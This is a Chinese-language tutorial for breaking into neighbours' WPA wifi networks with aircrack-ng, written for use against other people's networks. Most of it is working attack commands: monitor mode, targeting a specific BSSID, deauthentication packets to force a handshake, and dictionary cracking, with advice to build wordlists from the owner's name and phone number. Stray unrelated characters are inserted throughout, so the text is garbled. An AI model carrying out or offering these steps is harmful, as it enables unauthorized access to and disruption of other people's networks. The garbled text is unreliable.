在網(wǎng)速極其重要的今天能夠隨時(shí)隨地連上wifi是多么的重要庄蹋,但我看到看見附近的無線wifi這么多,不蹭不開心哀蘑。
當(dāng)然現(xiàn)在已經(jīng)有一些高度集成的wifi破解工具顿苇,不過今天介紹的這款工具還是要做不少工作。廢話不多直接上教程蜒程。
1绅你、確認(rèn)你的無線網(wǎng)卡支持
具體的可以參考aricrack兼容性,這里我就不多說了昭躺。
2忌锯、下載aircrack并安裝
官網(wǎng)上可以直接找到win版和linux版的程序。我用的是linux的领炫,用win的可以參考其他教程偶垮,不過想來也是差不多的。本人安裝kali自帶帝洪,也沒有手動(dòng)安裝针史,就不獻(xiàn)丑了。
3碟狞、開始教程
1啄枕、關(guān)閉網(wǎng)絡(luò)
service network-manager stop
2、結(jié)束可能會(huì)影響結(jié)果的進(jìn)程
airmon-ng check kill
3族沃、查看網(wǎng)卡列表
iwconfig
4频祝、啟動(dòng)網(wǎng)卡到監(jiān)聽模式
選擇適合你的無線網(wǎng)卡,wlan0請(qǐng)隨著本地iwconfig顯示的信息更改脆淹。
airmon-ng start wlan0
5常空、監(jiān)聽周圍所有無線網(wǎng)絡(luò)信息
prism0跟隨本地的信息更改,如上圖盖溺。
airodump-ng prism0
由于附近的wifi比較多漓糙,a切換顯示界面。
6烘嘱、監(jiān)聽感興趣的無線網(wǎng)絡(luò)
根據(jù)上一步的結(jié)果執(zhí)行如下命令:
說明兩點(diǎn):一昆禽、-c 后面跟的是該行CH的值蝗蛙。 二、-w跟隨的是保存的文件名醉鳖,可以任意取捡硅。
airodump-ng --bssid 14:75:90:C0:5E:68 -c 6 -w tmp prism0
7、加快得到握手包
保持上一步中的窗口不關(guān)盗棵,新開一個(gè)窗口壮韭,執(zhí)行如下命令:
這一條我一般是1-2分鐘執(zhí)行一次,執(zhí)行20-30次還沒有結(jié)果我就會(huì)放棄這個(gè)wifi纹因,換一個(gè)破解(畢竟周圍的網(wǎng)絡(luò)比較多喷屋,破解幾個(gè)就行了)。當(dāng)然也沒有明確的規(guī)定瞭恰,執(zhí)行的頻率屯曹。
aireplay-ng -0 2 -a 14:75:90:C0:5E:68 -c CC:A2:23:A3:7D:4D prism0
一直等到6、的窗口有wpa握手包后才可將6寄疏、停止是牢。
8、關(guān)閉監(jiān)聽接口
airmon-ng stop prism0
9陕截、啟動(dòng)網(wǎng)絡(luò)
service network-manager start
10驳棱、破解密碼
這個(gè)是一個(gè)靠運(yùn)氣和耐心的活兒。首先要有一個(gè)比較好的wifi字典农曲,如果沒有就去下載一個(gè)社搅。或者你知道一些敏感的信息乳规,比如wifi主人的名字形葬、電話等等,就去下載一個(gè)密碼生成器暮的,搜索一下笙以,有一大堆,我就不推薦了冻辩。
我得到的握手包是tmp.cap 密碼字典是pass.txt:
aircrack tmp-01.cap -w pass.txt
我的筆記本跑了一夜沒跑出來……心里苦猖腕。
換一個(gè)wifi從頭開始。
